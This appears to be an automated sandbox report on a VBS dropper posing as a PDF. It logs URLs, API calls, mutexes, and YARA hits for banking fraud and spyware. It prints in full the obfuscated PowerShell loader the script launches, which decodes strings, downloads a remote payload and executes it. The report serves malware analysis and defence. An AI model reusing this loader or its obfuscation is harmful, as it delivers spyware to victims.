              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://www.office.com/
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041183A OpenClipboard,GetLastError,10_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR

              System Summary

              barindex
              Source: Initial file: Call Agrammaphasia.ShellExecute(Silverers, Chr(34) & Nonpardoning & Chr(34), "", "", Interne)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7EC0221_2_00007FFD9B7EC022
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7EB2BF1_2_00007FFD9B7EB2BF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0446F3403_2_0446F340
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0446FC103_2_0446FC10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0446EFF83_2_0446EFF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC7B5C18_2_1FC7B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC871948_2_1FC87194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040503812_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041208C12_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004050A912_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040511A12_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043C13A12_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004051AB12_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044930012_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040D32212_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A4F012_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043A5AB12_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041363112_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044669012_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A73012_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004398D812_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004498E012_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044A88612_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0043DA0912_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00438D5E12_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00449ED012_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041FE8312_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00430F5412_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004050C213_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004014AB13_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040513313_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004051A413_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040124613_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040CA4613_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040523513_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004032C813_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040168913_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00402F6013_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: MV STARSHIP AQUILA_pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5227
              Source: unknownProcess created: Commandline size = 5227
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5227Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,10_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,10_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Plasmagel.RefJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2aep3m4.xfw.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4948
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2060
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
